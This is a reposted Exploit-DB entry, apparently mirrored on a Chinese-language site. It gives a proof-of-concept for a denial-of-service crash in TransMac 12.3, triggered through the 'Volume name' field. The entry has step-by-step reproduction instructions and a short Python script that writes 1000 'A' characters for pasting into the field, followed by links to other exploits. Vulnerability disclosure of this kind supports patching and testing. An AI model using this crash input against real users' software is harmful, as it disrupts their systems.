TransMac 12.3 – Denial of Service (PoC)

Exploit Database
48 阅读

作者： Alejandra Sánchez

日期： 2019-02-28
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46470/

# -*- coding: utf-8 -*-
# Exploit Title: TransMac 12.3 - 'Volume name' Denial of Service (PoC)
# Date: 27/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.acutesystems.com/
# Software Link: https://www.acutesystems.com/tmac/tmsetup.exe 
# Version: 12.3
# Tested on: Windows 10


# Proof of Concept:
# 1.- Run the python script "TransMac.py", it will create a new file "TransMac.txt"
# 2.- Copy the content of the new file 'TransMac.txt' to clipboard
# 3.- Open TransMac.exe
# 4.- Go to File > New Disk Image
# 5.- Paste clipboard in 'Volume name' field
# 6.- Click on button -> Ok
# 7.- Save the new disk with any name, e.g 'exploit.dmg'
# 8.- Crashed

buffer = "\x41" * 1000
f = open ("TransMac.txt", "w")
f.write(buffer)
f.close()

last Exploits
TransMac 12.3 – Denial of Service (PoC)的更多信息

Advantech Webaccess 8.0 / 3.4.3 – ActiveX Multiple Vulnerabilities：
WebKit – ‘detachWrapper’ Use-After-Free：
Soda PDF Professional 1.2.155 – ‘.pdf’ / ‘.WWF’ File Handling Denial of Service：
SmartFTP Client 10.0.2909.0 – ‘Multiple’ Denial of Service (PoC)：
BlueStacks 4.80.0.1060 – Denial of Service (PoC)：
GOM Player 2.3.10.5266 – ‘.fpx’ Denial of Service：
Adobe Flash – YUVPlane Decoding Heap Overflow：
Core FTP 2.0 – ‘XRMD’ Denial of Service (PoC)：